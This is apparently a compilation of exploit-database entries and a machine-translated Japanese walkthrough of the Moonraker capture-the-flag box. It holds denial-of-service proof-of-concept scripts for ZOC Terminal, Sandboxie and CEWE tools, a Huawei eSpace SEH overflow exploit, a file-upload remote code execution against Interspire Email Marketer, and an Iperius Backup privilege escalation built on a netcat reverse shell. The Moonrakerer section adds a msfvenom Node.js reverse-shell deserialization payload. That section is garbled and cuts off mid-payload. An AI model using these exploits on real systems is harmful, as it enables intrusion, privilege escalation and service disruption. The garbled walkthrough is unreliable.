#Exploit Title: ZOC Terminal v7.23.4 - 'Shell' Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2019-05-15 #Vendor Homepage: https://www.emtec.com #Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe #Tested Version: 7.23.4 #Tested on: Windows 7 Service Pack 1 x64 #Steps to produce the crash: #1.- Run python code: ZOC_Terminal_sh.py #2.- Open zoc_sh.txt and copy content to clipboard #3.- Open ZOC Terminal #4.- Select Options > Program Settings... > Special Files #5.- Select "Shell" field erease the content and Paste ClipBoard #6.- Click on "Save" #7.- Select View > "Command Shell" and select "ok" #8.- Crashed cod = "\x41" * 270 f = open('zoc_sh.txt', 'w') f.write(cod) f.close()

#Exploit Title: ZOC Terminal v7.23.4 - 'Private key file' Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2019-05-15 #Vendor Homepage: https://www.emtec.com #Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe #Tested Version: 7.23.4 #Tested on: Windows 7 Service Pack 1 x64 #Steps to produce the crash: #1.- Run python code: ZOC_Terminal_pkf.py #2.- Open zoc_pkf.txt and copy content to clipboard #3.- Open ZOC Terminal #4.- Select File > Create SSH Key Files... #5.- Select "Private key file:" field erease and Paste ClipBoard #6.- Click on "Create public/private key files..." #7.- Crashed cod = "\x41" * 2000 f = open('zoc_pkf.txt', 'w') f.write(cod) f.close()

# -*- coding: utf-8 -*- # Exploit Title: Sandboxie 5.30 - Denial of Service (PoC) # Date: 16/05/2019 # Author: Alejandra Sánchez # Vendor Homepage: https://www.sandboxie.com # Software https://www.sandboxie.com/SandboxieInstall.exe # Version: 5.30 # Tested on: Windows 10 # Proof of Concept: # 1.- Run the python script 'Sandboxie.py', it will create a new file 'Sandboxie.txt' # 2.- Copy the text from the generated Sandboxie.txt file to clipboard # 3.- Open Sandboxie Control # 4.- Go to 'Configure' > 'Programs Alerts' # 5.- Click 'Add Program', paste clipboard in the field 'Select or enter a program' and click 'OK' # 6.- Click 'OK' and crashed buffer = "\x41" * 5000 f = open ("Sandboxie.txt", "w") f.write(buffer) f.close()

0x01 序文 Moonrakerシステムを攻撃し、最大の脅威の脆弱性を見つけ、最大の脅威の脆弱性を通じてターゲットマシンシステムを攻撃し、最大の脅威の脆弱性を通じてシステムのルートディレクトリのフラグ情報を取得します。 MoonRaker: 1ミラーダウンロードアドレス： http://drive.google.com/open?id=13b2ewq5yqre2ubklxz58uhtlfk-shvma 0x02情報コレクション1。存続するホストルート@kali2018:/＃arp -scan -lをスキャン 見つかった192.168.1.10は、ターゲットマシンシステムです 2。ポートスキャンNAMPスキャンターゲットマシンポート root@kali2018:〜＃nmap -p -a 192.168.1.10 -open 2019-02-11 16:21 ESTでNMAP 7.70（https://nmap.org）を開始 192.168.1.10のNMAPスキャンレポート ホストはアップ（0.00077Sレイテンシ）です。 表示されていません: 65529閉じたポート ポートステートサービスバージョン 22/TCP Open SSHOPENSSH 7.4P1 Debian 10+Deb9U4（プロトコル2.0） | ssh-hostkey: | 2048 5F:BF:C03:3:5133604F:4A:A7:4A:7E:153:03:AA3333:D7:2A） | 256 5:5933608733601E:A4336046:BD:A73360FD:9A:5F:F933:B7333:9DSE） | _ 256 0D:883360D9:FA:AF:083:CE3:2B:133:6:A73:703:（ed eded 80/TCP Open HTTPAPACHE HTTPD 2.4.25（（Debian）） | http-robots.txt: 1無効エントリ | _/ | _http-server-header: apache/2.4.25（debian） | _HTTP-TITLE: MOONRAKER 3000/TCP Open httpnode.js Expressフレームワーク | http-auth: | http/1.1 401不正\ x0d | _ BASIC RELM=401 | _HTTP-TITLE:サイトにはタイトルがありません（text/html; charset=utf-8）。 4369/TCPオープンEpmderlangポートマッパーデーモン | EPMD-INFO: | EPMD_PORT: 4369 | nodes: | _ couchdb: 33681 5984/TCP Open CouchDB？ |フィンガープリントストリングス: | FOROHFORREQUEST: | HTTP/1.0 404オブジェクトが見つかりません | CACHE-CONTROL:必見の再評価 | Connection:閉じます | Content-Length: 58 | Content-Type:アプリケーション/JSON |日付:月、2019年2月11日21336022:55 GMT | server: couchdb/2.2.0（erlang otp/19） | X-Couch-Request-ID: BF092A958F | x-couchdb-body-time: 0 | {'error':'not_found'、 '理由':'databaseは存在しません。'} | getRequest: | HTTP/1.0 200 OK | CACHE-CONTROL:必見の再評価 | Connection:閉じます | Content-Length: 164 | Content-Type:アプリケーション/JSON |日付:月、2019年2月11日21336022:02 GMT | server: couchdb/2.2.0（erlang otp/19） | X-Couch-Request-ID: F038A56575 | x-couchdb-body-time: 0 | {'couchdb':'welcome'、 'version ':'2.2.0'、 'git_sha':'2a16ec4'、 'feature ': [' pluggedable-storage-engines '、' scheduler ']、' bendor'3360 | httpoptions: | HTTP/1.0 500内部サーバーエラー | CACHE-CONTROL:必見の再評価 | Connection:閉じます | Content-Length: 61 | Content-Type:アプリケーション/JSON |日付:月、2019年2月11日21336022:02 GMT | server: couchdb/2.2.0（erlang otp/19） | X-Couch-Request-ID: FDEB1A3860 | X-Couch-Stack-Hash: 1828508689 | x-couchdb-body-time: 0 | _ {'error':'unknown_error'、 '理由':'badarg'、 'ref':1828508689} NMAPスキャン出力は、オープンポートサービスを表示します：22（SSH）、80（HTTP）、110（POP3）、3000（node.js）、4369（epmd）、5984（couchdb） 3。ディレクトリスキャン。ディレクトリスキャンを実行するには、GobusterとDirbusterが好みます。ここでは、Gobusterを使用してターゲットディレクトリスキャンを実行します。 スキャンが完了した後、疑わしいディレクトリが /サービスであることがわかりました このディレクトリhttp://192.168.1.10/services/services/のリンクアドレスを開くと、Webページの下部にiniriryを送信するハイパーリンクが表示され、ハイパーリンクを開きます。 リンクを開いた後、アフターセールスの連絡先情報ページが表示されます。誰かが提出した情報を照会し、5分以内に私たちに連絡することに注意してください。 ここでは、IMGタグを使用して、リモートサービスのWebサイトアドレスをネストします。 （他のパーティがネストされたXSSにアクセスする限り、リモートサーバーのログが記録され、リクエストログレコードにアクセスします） 情報を送信する前に、Apacheサービスを開始し、/var/www/htmlディレクトリで新しいテストファイルtest.txtを作成し、コンテンツを書き込みます。 root@kali2018:〜＃/etc/init.d/apache2 start [OK] Apache2を開始（SystemCtl経由）: Apache2.Service。 root@kali2018:〜＃cd /var /www root@kali2018:/var/www＃ls HTML root@kali2018:/var/www＃cd html/ root@kali2018:/var/www/html＃ls index.html index.nginx-debian.html root@kali2018:/var/www/html＃vi test.txt root@kali2018:/var/www/html＃ Apacheサーバーをテストして、正常にアクセスします 次に、apache2 Access.logを使用して、ターゲットマシンWebサイトのロギングを表示できます。 [送信]をクリックした後、次の図に示されているように、ありがとう提出メッセージを表示しました。 コマンド経由でapacheアクセスログを表示します Tail -f /var/log/apache2/access.log ログ：http://192.168.1.10/svc-inq/salesmoon-gui.phpで興味深いHTTP参照アドレスを見つけることができます 0x03脆弱性1.CouchDB情報コレクションBrowserでHTTP参照リクエストアドレスを開きます 次に、「販売管理バックエンドに戻る」のハイパーリンクが表示され、クリックして販売バックエンド管理ログインページに入ります。 次に、couchdbnotesをクリックして、ユーザー名のパスワードに関するいくつかのプロンプトを取得します。 ユーザー名：ジョーズ、パスワード：ジョーズガールフレンド名+ x99 ここでは、ジョーズのガールフレンドをグーグルします FauxtonシステムのApache CouchDBのユーザー名とパスワードが取得されました。 FauxtonとCouchDBの詳細については、Googel（http://docs.couchdb.org/en/stable/fauxton/install.html）を介してそれらの使用方法を検索できます。 2.CouchDBログインと情報漏れは、ポート5984が開いているためです。 CouchDBログインページ（192.168.1.10:5984/_utils/）を開くことができます。 ここでは、次のようにログイン資格情報を使用します。 username:jaws Password:Dollyx99 正常にログインして、これらの3つのデータベースで情報を表示しましょう。 リンクデータベースはより多くの情報を公開します 各リンクデータベースのドキュメントをチェックしてください。それぞれにはディレクトリリンクが含まれているためですが、3番目のディレクトリリンクは次の侵入に有用な情報を提供する場合があります。 したがって、3番目のドキュメントへの接続を開き、有用な接続ディレクトリ情報を表示します。 したがって、上記のリンクには、開いた後の人事オフィスメモの情報が表示されます（複数の人の重要な電子メール情報はここに記録されています） ユーザー名とパスワードがメールでリークされていることがわかります 3.Node.js降下解像度http://192.168.1.10/Raker-Sales/BackEnd Managementページを開き、「Hugoのページがポート3Kに移動した」ページが興味深いことを見つけます（上記の人事メモ記録ページのHugoメール情報と組み合わせて） このリンクを開いた後、node.jsサーバーとアクセスに関する情報を見ることができます Hugo's HR Email http://192.168.1.10/hr-Confidential/offer-letters.htmlのユーザー名とパスワード node.jsにログインするためのユーザー名とパスワードを表示します（ポート3000経由でアクセス） ログインした後、node.jsサーバーは「set-cookie」メッセージを送信します。 node.jsの崩壊脆弱性については、このリンクアドレスを参照してください。 4.脱力化の脆弱性はNMAPスキャンから出力されます。ポート3000はnode.jsフレームワークアプリケーションであることがわかります。したがって、ブラウザにターゲットIPの3000ポートアプリケーションを開き、ログインユーザーインターフェイスをポップアップします。 username:hugo Password:TemplelaserSl2K ログインに正常にログインした後、ページにメッセージが表示されます。このページは役に立たないようですが、次に何をすべきかを理解するために時間をかけた後、非常に興味深いものになります。 F12を開始して、ページのリクエスト情報を表示します。 CookieでBase64エンコード情報を見ました。ここでは、base64エンコーディングにnode.jsのスターリア化の脆弱性を挿入します。 MSFvenomを使用してNodeJSリバウンドシェルを生成します msfvenom -p nodejs/shell_reverse_tcp lhost=192.168.1.21 lport=1234 ターミナルからrce.jsにmsfvenomを出力します RCE.JS： var rev={ rce: function（）{var require=global.require || Global.process.mainmodule.constructor._load; if（！require）return; var cmd=（global.process.platform.match（/^win/i））？ 'cmd' : '/bin/sh'; var net=require（ 'net'）、cp=require（ 'child_process'）、util=require（ 'util'）、sh=cp.spawn（cmd、[]）; var client=this; var counter=0; function stagerrepeat（）{client.socket=net.connect（1234、 '192.168.1.21'、function（）{client.socket.pipe（sh.stdin）; if（typeof util.pump==='undefined'）{sh.stdout.pipe（client.socket）; util.pump（sh.stdout、socket）; socket.on（ 'error'、function（error）{counter ++; if（counter=10）{setimeout（）{stagerrepeat（）;}、5*1000）;} else process.exit（）;}）; } stagerrepeat（）; } }; var serialize=require（ 'node-serialize'）; console.log（serialize.serialize（rev））; ノードrce.jsを実行して、シリアル化された文字列出力を取得します。 root@kali2018:/opt＃node rce.js {'rce':' _ $$ nd_func $$ _ f

#!/usr/bin/env python # -*- coding: utf-8 -*- # # Huawei eSpace Meeting cenwpoll.dll Unicode Stack Buffer Overflow with SEH Overwrite # # # Vendor: Huawei Technologies Co., Ltd. # Product web page: https://www.huawei.com # Affected application: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC) # Affected application: Mobile Office eConference V200R003C01 6.0.0.268.v67290 # Affected module: cenwpoll.dll 1.0.8.8 # Binaries affected: mcstub.exe, classreader.exe, offlinepolledit.exe, eSpace.exe # # Product description: # -------------------- # 1. Create more convenient Enhanced Communications (EC) services for your enterprise with this suite of # products. Huawei’s EC Suite (ECS) solution combines voice, data, video, and service streams, and provides # users with easy and secure access to their service platform from any device, in any place, at any time. # 2. The eSpace Meeting allows you to join meetings that support voice, data, and video functions using # the PC client, the tablet client, or an IP phone, or in a meeting room with an MT deployed. # # Vulnerability description: # -------------------------- # eSpace Meeting is prone to a stack-based buffer overflow vulnerability (seh overwrite) because it fails # to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer when # handling QES files. Attackers can exploit this issue to execute arbitrary code within the context of # the affected application. Failed exploit attempts will likely result in denial-of-service conditions. # # Tested on: # ---------- # OS Name: Microsoft Windows 7 Professional # OS Version: 6.1.7601 Service Pack 1 Build 7601 # RAM 4GB, System type: 32bit, Processor: Intel(R) Core(TM) i5-4300U CPU 1.90GHz 2.50GHz # # Vulnerability discovered by: # ---------------------------- # Gjoko 'LiquidWorm' Krstic # Senior STTE # SCD-ERC # Munich, Germany # 26th of August (Tuesday), 2014 # # PSIRT details: # -------------- # Security advisory No.: Huawei-SA-20141217- espace # Initial release date: Dec 17, 2014 # Vulnerability ID: HWPSIRT-2014-1151 # CVE ID: CVE-2014-9415 # Patched version: eSpace Meeting V100R001C03 # Advisory URL: https://www.huawei.com/en/psirt/security-advisories/hw-406589 # # # ------------------------------------ WinDBG output ------------------------------------ # # m_dwCurrentPos = 0 ,dwData = 591 ,m_dwGrowSize = 4096(1db0.1828): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=00000000 ebx=00410041 ecx=00000000 edx=00000578 esi=08de1ad8 edi=00410045 # eip=05790f3e esp=02fc906c ebp=02fecd00 iopl=0 nv up ei pl zr na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 # *** WARNING: Unable to verify checksum for C:\Program Files\eSpace-ecs\conf\cwbin\cenwpoll.dll # *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\eSpace-ecs\conf\cwbin\cenwpoll.dll - # cenwpoll!DllUnregisterServer+0xa59e: # 05790f3e 8178082c010000 cmp dword ptr [eax+8],12Ch ds:0023:00000008=???????? # 0:008> !exchain # 02feccf4: *** WARNING: Unable to verify checksum for C:\Program Files\eSpace-ecs\conf\cwbin\mcstub.exe # *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\eSpace-ecs\conf\cwbin\mcstub.exe # mcstub+10041 (00410041) # Invalid exception stack at 00410041 # Instruction Address: 0x0000000005790f3e # # Description: Exception Handler Chain Corrupted # Short Description: ExceptionHandlerCorrupted # Exploitability Classification: EXPLOITABLE # Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at cenwpoll!DllUnregisterServer+0x000000000000a59e (Hash=0xbc5aacab.0x6c23bb0b) # # Corruption of the exception handler chain is considered exploitable # # 0:008> d ebp # 02fecd00 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. # 02fecd10 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. # 02fecd20 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. # 02fecd30 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. # 02fecd40 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. # 02fecd50 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. # 02fecd60 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. # 02fecd70 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. # 0:008> u ebp # 02fecd00 41 inc ecx # 02fecd01 004100 add byte ptr [ecx],al # 02fecd04 41 inc ecx # 02fecd05 004100 add byte ptr [ecx],al # 02fecd08 41 inc ecx # 02fecd09 004100 add byte ptr [ecx],al # 02fecd0c 41 inc ecx # 02fecd0d 004100 add byte ptr [ecx],al # # ------------------------------------ /WinDBG output ------------------------------------ # # import sys, os, time os.system('title jterm') os.system('color f5') os.system('cls') piton = os.path.basename(sys.argv[0]) def usage(): print ''' +---------------------------------------------+ | eSpace Meeting Stack Buffer Overflow Vuln | | | | Vuln ID: HWPSIRT-2014-1151 | | CVE ID: CVE-2014-9415 | +---------------------------------------------+ ''' if len(sys.argv) < 2: print 'Usage: \n\n\t'+piton+' <OPTION>' print '\nOPTION:\n' print '\t0 - Create the evil PoC file.' print '\t1 - Create the evil file, start the vulnerable application and crash it.' print '\t2 - Create the evil file, start the vulnerable application under Windows Debugger with SEH chain info.\n' quit() usage() crash = sys.argv[1] dir = os.getcwd(); file = "evilpoll.qes" header = '\x56\x34\x78\x12\x01\x00\x09\x00' # V4x..... time.sleep(1) # Overwrite FS:[0] chain (\x43 = EIP) buffer = '\x41' * 353 +'\x42' * 2 +'\x43' * 2 +'\x44' * 42 +'New Poll' # \x44 can be incremented (byte space for venetian shellcode) buffer += '\x00\x01\x00\x00\x00\x00\x00\x90' buffer += '\x85\xA9\xD7\x00\x01\x04\x00' buffer += 'TEST'+'\x01\x02\x05\x00' buffer += 'ANSW1'+'\x05\x00' buffer += 'ANSW2' poc = header + buffer bytes = len(poc) print '[+] Creating evil PoC file...' time.sleep(1) print '[+] Buffering:\n' time.sleep(1) index = 0 while index < len(poc): char = poc[index] #print char, sys.stdout.write(char) time.sleep(10.0 / 1000.0) index = index + 1 try: writeFile = open (file, 'w') writeFile.write( poc ) writeFile.close() time.sleep(1) print '\n\n[+] File \"'+file+'\" successfully created!' time.sleep(1) print '[+] Location: "'+dir+'"' print '[+] Wrote '+str(bytes)+' bytes.' except: print '[-] Error while creating file!\n' if crash == '0': print '\n\n[+] Done!\n' elif crash == '1': print '[+] The script will now execute the vulnerable application with the PoC file as its argument.\n' os.system('pause') os.system('C:\\Progra~1\\eSpace-ecs\\conf\\cwbin\\classreader.exe "%~dp0evilpoll.qes"') elif crash == '2': print '[+] The script will now execute the vulnerable application with the PoC file as its argument under Windows Debugger.\n' os.system('pause') os.system('C:\\Progra~1\\Debugg~1\\windbg.exe -Q -g -c "!exchain" -o "C:\\Progra~1\eSpace-ecs\conf\cwbin\classreader.exe" "%~dp0evilpoll.qes"') print '\n[+] You should see something like this in WinDBG:' print ''' 0:000> d 0012e37c 0012e37c 42 00 42 00 43 00 43 00-44 00 44 00 44 00 44 00 B.B.C.C.D.D.D.D. 0012e38c 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D. 0012e39c 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D. 0012e3ac 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D. 0012e3bc 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D. 0012e3cc 44 00 44 00 44 00 44 00-44 00 44 00 4e 00 65 00 D.D.D.D.D.D.N.e. 0012e3dc 77 00 20 00 50 00 6f 00-6c 00 6c 00 00 00 00 00 w. .P.o.l.l..... 0012e3ec c2 01 00 00 56 34 78 12-70 09 87 02 00 00 00 00 ....V4x.p....... 0:000> !exchain 0012e37c: 00430043 Invalid exception stack at 00420042 ''' else: print '[+] Have a nice day! ^^\n' quit() print '\n[+] Have a nice day! ^^\n' #os.system('color 07')

# Exploit Title: Interspire Email Marketer 6.20 - Remote Code Execution # Date: May 2019 # Exploit Author: Numan Türle # Vendor Homepage: https://www.interspire.com # Software Link: https://www.interspire.com/emailmarketer # Version: 6.20< # Tested on: windows # CVE : CVE-2018-19550 # https://medium.com/@numanturle/interspire-email-marketer-6-20-exp-remote-code-execution-via-uplaod-files-27ef002ad813 surveys_submit.php if (isset($_FILES['widget']['name'])) { $files = $_FILES['widget']['name']; foreach ($files as $widgetId => $widget) { foreach ($widget as $widgetKey => $fields) { foreach ($fields as $fieldId => $field) { // gather file information $name = $_FILES['widget']['name'][$widgetId]['field'][$fieldId]['value']; $type = $_FILES['widget']['type'][$widgetId]['field'][$fieldId]['value']; $tmpName = $_FILES['widget']['tmp_name'][$widgetId]['field'][$fieldId]['value']; $error = $_FILES['widget']['error'][$widgetId]['field'][$fieldId]['value']; $size = $_FILES['widget']['size'][$widgetId]['field'][$fieldId]['value']; // if the upload was successful to the temporary folder, move it if ($error == UPLOAD_ERR_OK) { $tempdir = TEMP_DIRECTORY; $upBaseDir = $tempdir . DIRECTORY_SEPARATOR . 'surveys'; $upSurveyDir = $upBaseDir . DIRECTORY_SEPARATOR . $formId; $upDir = $upSurveyDir . DIRECTORY_SEPARATOR . $response->GetId(); // if the base upload directory doesn't exist create it if (!is_dir($upBaseDir)) { mkdir($upBaseDir, 0755); } if (!is_dir($upSurveyDir)) { mkdir($upSurveyDir, 0755); } // if the upload directory doesn't exist create it if (!is_dir($upDir)) { mkdir($upDir, 0755); } // upload the file move_uploaded_file($tmpName, $upDir . DIRECTORY_SEPARATOR . $name); } } } } } input file name : widget[0][field][][value] submit : surveys_submit.php?formId=1337 POST /iem/surveys_submit.php?formId=1337 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryF2dckZgrcE306kH2 Content-Length: 340 ------WebKitFormBoundaryF2dckZgrcE306kH2 Content-Disposition: form-data; name="widget[0][field][][value]"; filename="info.php" Content-Type: application/octet-stream <?php phpinfo(); ?> ------WebKitFormBoundaryF2dckZgrcE306kH2 Content-Disposition: form-data; name="submit" Submit ------WebKitFormBoundaryF2dckZgrcE306kH2- #### POC <!DOCTYPE HTML> <html lang="en-US"> <head> <meta charset="UTF-8"> <title></title> </head> <body> <form action="http://WEBSITE/surveys_submit.php?formId=1337" method="post" enctype="multipart/form-data"> <input type="file" name="widget[0][field][][value]"> <input type="submit" value="submit" name="submit"> </form> </body> </html> URL : http://{{IEM LINK}}/admin/temp/surveys/1337/{{FUZZING NUMBER}}/{{FILENAME}}

Exploit Author: bzyo Twitter: @bzyo_ Exploit Title: Iperius Backup 6.1.0 - Privilege Escalation Date: 04-24-19 Vulnerable Software: Iperius Backup 6.1.0 Vendor Homepage: https://www.iperiusbackup.com/ Version: 6.1.0 Software Link: https://www.iperiusbackup.com/download.aspx Tested on: Windows 10 x64 Details: Iperius Backup Service must run as Local System or a system administrator. By default the application allows for low privilege users to create/run backup jobs and edit existing jobs due to file permissions. An option when creating a backup job is to run a program before or after the backup job. The backup job is run as the user of the running service, as such the program requested to run before or after a backup job is run as that same user. A low privilege user could abuse this and escalate their privileges to either local system or an administrator account. Vendor Post - Installation as Windows service: what it is and why it’s important https://www.iperiusbackup.net/en/installation-windows-service-iperius-backup/ Prerequisites: To successfully exploit this vulnerability, an attacker must already have local access to a system running Iperius Backup and Iperius Backup Service using a low privileged user account Exploit: 1. Login as low privilege user where Iperius Backup and Iperius Backup Service are installed 2. Download netcat from attacking machine c:\users\low\downloads\nc.exe 3. Create batch file calling netcat and sending command prompt to attacking machine c:\users\low\desktop\evil.bat @echo off c:\users\low\downloads\nc.exe 192.168.0.163 443 -e cmd.exe 4. Setup listener on attacking machine nc -nlvvp 443 5. Open Iperius Backup and create new backup job - set any folder to backup (c:\temp) - set to any destination (c:\users\low\desktop) - set program to run before backup job (c:\users\low\desktop\evil.bat) 6. Right-click on newly created job and select "Run backup service as" - will either be local system or administrator account 7. Command prompt on attacking machine will appear C:\Program Files (x86)\Iperius Backup>whoami whoami <computer name>\<administrator> Or C:\Program Files (x86)\Iperius Backup>whoami whoami nt authority\system Risk: The vulnerability allows local attackers to escalate privileges and execute arbitrary code as Local System or Administrator Notes: Able to open elevated command prompt locally if service is running as local system, but not when using an administrator account. Also able to backup entire administrator user profile as low privilege account. Fix: Remove Everyone permission to folder c:\ProgramData\IperiusBackup

# -*- coding: utf-8 -*- # Exploit Title: CEWE PHOTO IMPORTER 6.4.3 - Denial of Service (PoC) # Date: 16/05/2019 # Author: Alejandra Sánchez # Vendor Homepage: https://cewe-photoworld.com/ # Software: https://cewe-photoworld.com/creator-software/windows-download # Version: 6.4.3 # Tested on: Windows 10 # Proof of Concept: # 1.- Run the python script 'photoimporter.py',it will create a new file "sample.jpg" # 2.- Open CEWE PHOTO IMPORTER # 3.- Select the 'sample.jpg' file created and click 'Import all' # 4.- Click 'Next' and 'Next', you will see a crash buffer = "\x41" * 500000 f = open ("sample.jpg", "w") f.write(buffer) f.close()

# -*- coding: utf-8 -*- # Exploit Title: CEWE PHOTO SHOW 6.4.3 - Denial of Service (PoC) # Date: 16/05/2019 # Author: Alejandra Sánchez # Vendor Homepage: https://cewe-photoworld.com/ # Software: https://cewe-photoworld.com/creator-software/windows-download # Version: 6.4.3 # Tested on: Windows 10 # Proof of Concept: # 1.- Run the python script 'photoshow.py', it will create a new file 'photoshow.txt' # 2.- Copy the text from the generated photoshow.txt file to clipboard # 3.- Open CEWE PHOTO SHOW # 4.- Click 'Upload' # 5.- Paste clipboard in the field 'Password' and crashed buffer = "\x41" * 5000 f = open ("photoshow.txt", "w") f.write(buffer) f.close()

Huawei eSpace Meeting Image File Format Handling Buffer Overflow Vulnerability Vendor: Huawei Technologies Co., Ltd. Product web page: https://www.huawei.com Affected version: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC) Summary: Create more convenient Enhanced Communications (EC) services for your enterprise with this suite of products. Huawei’s EC Suite (ECS) solution combines voice, data, video, and service streams, and provides users with easy and secure access to their service platform from any device, in any place, at any time. The eSpace Meeting allows you to join meetings that support voice, data, and video functions using the PC client, the tablet client, or an IP phone, or in a meeting room with an MT deployed. Desc: eSpace Meeting conference whiteboard functionality is vulnerable to a buffer overflow issue when inserting known image file formats. Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions. Vuln modules (no DEP/ASLR): C:\Program Files\eSpace-ecs\conf\cwbin\classmgr.dll C:\Program Files\eSpace-ecs\conf\cwbin\MiniGDIEx.dll Tested on: Microsoft Windows 7 Professional Vulnerability discovered by Gjoko 'LiquidWorm' Krstic 23.09.2014 Patched version: V100R001C03 Vuln ID: HWPSIRT-2014-1156 CVE ID: CVE-2014-9417 Advisory: https://www.huawei.com/en/psirt/security-advisories/hw-406589 -- Reference magic numbers (hex signature): JPG/JPEG - FF D8 FF BMP - 42 4D PNG - 89 50 4E 47 0D 0A 1A 0A 0:024> g CClassMgrFrameWnd::OnKeyUp lParam = -1072758783Get config of string parameter:box, value: (2110.2258): Unknown exception - code c0000002 (first chance) (2110.2258): Unknown exception - code c0000002 (first chance) (2110.1b08): C++ EH exception - code e06d7363 (first chance) (2110.1b08): C++ EH exception - code e06d7363 (!!! second chance !!!) eax=036de3f4 ebx=01709870 ecx=00000003 edx=00000000 esi=7c380edc edi=036de484 eip=75ae812f esp=036de3f4 ebp=036de444 iopl=0 nv up ei pl nz ac po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\KERNELBASE.dll - KERNELBASE!RaiseException+0x54: 75ae812f c9 leave 0:008> d esp *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\eSpace-ecs\conf\cwbin\MSVCR71.dll - 036de3f4 63 73 6d e0 01 00 00 00-00 00 00 00 2f 81 ae 75 csm........./..u 036de404 03 00 00 00 20 05 93 19-98 e4 6d 03 30 82 3d 7c .... .....m.0.=| 036de414 00 00 00 00 18 00 00 00-14 33 41 7c 60 e4 6d 03 .........3A|`.m. 036de424 b3 16 34 7c 00 00 9c 01-00 00 00 00 b8 16 34 7c ..4|..........4| 036de434 44 4b 41 7c 98 e4 6d 03-70 98 70 01 98 98 70 01 DKA|..m.p.p...p. 036de444 84 e4 6d 03 ed 9a 35 7c-63 73 6d e0 01 00 00 00 ..m...5|csm..... 036de454 03 00 00 00 78 e4 6d 03-98 98 70 01 54 16 3d 7c ....x.m...p.T.=| 036de464 63 73 6d e0 01 00 00 00-00 00 00 00 00 00 00 00 csm............. 0:008> d 036de474 03 00 00 00 20 05 93 19-98 e4 6d 03 30 82 3d 7c .... .....m.0.=| 036de484 a8 e4 6d 03 5a 8b 3c 7c-98 e4 6d 03 30 82 3d 7c ..m.Z.<|..m.0.=| 036de494 54 2b fc ab 54 16 3d 7c-58 a9 71 01 01 00 00 00 T+..T.=|X.q..... 036de4a4 70 16 3d 7c 3c e8 6d 03-e0 d9 b0 04 00 00 00 00 p.=|<.m......... 036de4b4 66 13 af 04 54 2b fc ab-80 94 6f 01 3c e8 6d 03 f...T+....o.<.m. 036de4c4 30 ed 6d 03 00 00 00 00-ec e4 6d 03 00 00 00 00 0.m.......m..... 036de4d4 0b 00 00 00 00 00 00 00-41 41 41 41 41 41 41 41 ........AAAAAAAA 036de4e4 41 41 41 41 41 41 41 41-28 00 00 00 41 41 00 00 AAAAAAAA(...AA.. 0:008> d 036de4f4 41 41 00 00 41 41 41 41-00 00 00 00 54 2b fc ab AA..AAAA....T+.. 036de504 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 036de514 00 00 00 00 24 ed 6d 03-22 a0 af 76 43 f0 ed 63 ....$.m."..vC..c 036de524 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 036de534 30 ed 6d 03 45 76 58 06-42 4d 00 0d 41 41 41 41 0.m.EvX.BM..AAAA 036de544 41 41 41 41 41 41 6d 03-3b 23 af 04 3c e8 6d 03 AAAAAAm.;#..<.m. 036de554 80 94 6f 01 88 ef 6d 03-05 02 00 00 00 00 00 00 ..o...m......... 036de564 73 00 70 00 84 f2 b0 04-00 00 00 00 00 00 00 00 s.p............. 0:008> d 036de574 42 4d 00 0d 41 41 41 41-41 41 41 41 41 41 41 41 BM..AAAAAAAAAAAA 036de584 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 036de594 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 036de5a4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 036de5b4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 036de5c4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 036de5d4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 036de5e4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA -- PNG Decoder error msg:$s Invalid parameter passed to C runtime function. Invalid parameter 